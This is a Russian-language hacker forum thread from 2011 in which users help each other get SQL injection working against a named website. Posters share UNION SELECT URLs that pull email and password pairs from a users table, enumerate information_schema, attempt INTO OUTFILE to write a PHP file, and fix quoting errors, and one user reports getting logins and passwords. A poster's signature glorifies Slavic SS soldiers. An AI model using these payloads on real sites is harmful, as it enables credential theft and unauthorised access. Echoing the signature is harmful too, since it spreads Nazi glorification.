
01.10.2011, 18:56
|
|
Новичок
Регистрация: 12.08.2011
Сообщений: 18
С нами:
7764086
Репутация:
0
|
|
попробывал этот запрос. Выдает ошибку
(Could not find stored procedure 'master..sp_makewebtask'.)
|
|
|

01.10.2011, 18:58
|
|
Познающий
Регистрация: 18.10.2009
Сообщений: 80
С нами:
8718197
Репутация:
11
|
|
запрос +UNION+SELECT+1,``,3+from+mysql.user+into+outfile+ `0x2f746d702f31312e706870`--+
в ответ ошибка supplied argument is not a valid MySQL result resource in
Подскажите где она?
|
|
|

01.10.2011, 19:16
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
С нами:
10585560
Репутация:
1550
|
|
Сообщение от OxoTnik
Возможен такой вариант, что просто отказывает в выводе таблиц?
мой запрос выглядел по моему правильно
Ошибка
Unknown column 'users' in 'where clause'
users захекси..
|
|
|

01.10.2011, 19:16
|
|
Участник форума
Регистрация: 26.06.2010
Сообщений: 179
С нами:
8357366
Репутация:
6
|
|
users хексни!
0x7573657273
http://steelmuscle.org/hex.php
|
|
|

01.10.2011, 19:16
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
С нами:
8885780
Репутация:
672
|
|
Сообщение от wkar
запрос +UNION+SELECT+1,``,3+from+mysql.user+into+outfile+ `0x2f746d702f31312e706870`--+
в ответ ошибка supplied argument is not a valid MySQL result resource in
Подскажите где она?
во первых получишь ошибку
Unknown column '' in 'field list' (указывать надо в прямых ковычках)
во вторых путь к файлу (После into outfile) надо указать в ковычках а не в ( `` )
в третих нельзя захексить путь
|
|
|

01.10.2011, 19:17
|
|
Новичок
Регистрация: 12.08.2011
Сообщений: 18
С нами:
7764086
Репутация:
0
|
|
Сообщение от Ulitko
попробывал этот запрос. Выдает ошибку
(Could not find stored procedure 'master..sp_makewebtask'.)
забыл добавить, пытаюсь сделать все из под шелла
|
|
|

01.10.2011, 19:57
|
|
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
С нами:
9030566
Репутация:
2017
|
|
Сообщение от None
http://www.sait.ru/comment.php?idart=-11364+union+%0A+select+1,2,email,password,4,5,6+fr om+0x7573657273--
это шутка????from+0x7573657273
http://www.sait.ru/comment.php?idart=-11364+union+%0A+select+1,2,concat_ws(0x3a,email,pa ssword),4,5,6+fr om+users+--+
http://www.sait.ru/comment.php?idart=-11364+union+%0A+select+1,2,column_name,4,5,6+fr om+information_schema.columns+where+table_name=0x7 573657273+--+
как то так что бы тебе понятнее было что ты пытаешься сделать
__________________
В сырых могилах Второй Мировой
Солдатам снятся цветные сны.
Их кости порой видны под первой травой,
Когда сойдет снег в начале весны.
Славяне тоже сражались в отрядах СС
За чистоту арийской крови.
Теперь они дремлют за чертою небес,
Но снова встанут на бой, лишь позови.
|
|
|

01.10.2011, 20:10
|
|
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
С нами:
9030566
Репутация:
2017
|
|
Сообщение от OxoTnik
В моем запросе мне уже должен показаться логин и пароль, в твоем он показывает мне колонки которые я уже знаю
http://www.sait.ru/comment.php?idart=-11364+union+%0A+select+1,2,email,password,4,5,6+fr om+0x7573657273-- в этом?????????
в этом запросе он теб не покажет ни какие имайлы и пароли, чуть выше я тебе показал более менее рабочий запрос
__________________
В сырых могилах Второй Мировой
Солдатам снятся цветные сны.
Их кости порой видны под первой травой,
Когда сойдет снег в начале весны.
Славяне тоже сражались в отрядах СС
За чистоту арийской крови.
Теперь они дремлют за чертою небес,
Но снова встанут на бой, лишь позови.
|
|
|

01.10.2011, 21:09
|
|
Познающий
Регистрация: 06.03.2007
Сообщений: 59
С нами:
10095779
Репутация:
137
|
|
Сообщение от OxoTnik
Ошибся, он вывел мне логин пасс,спасибо"
только не совсем понятно что делает
concat_ws(0x3a,email,password)
спс все обьяснили
выражаю благодарность
HAXTA4OK
concat_ws() выводит в одном выводимом поле несколько значений которые определяются первыми символами до запятой, а все после запросы будут выводиться разделяясь первыми символами.
|
|
|

01.10.2011, 21:25
|
|
Познающий
Регистрация: 06.01.2009
Сообщений: 69
С нами:
9128075
Репутация:
3
|
|
Сообщение от OxoTnik
Ситуация
Я вошел в базу данных и с этим нет проблем, но мне известно что там ещё есть ещё 1 база данных, как там прогуляться, и что для этого нужно сделать?
узнать ее имя, и составлять запросы типа:
SELECT column from database2.table
|
|
|
|
 |
|
|
Здесь присутствуют: 4 (пользователей: 0 , гостей: 4)
|
|
|
|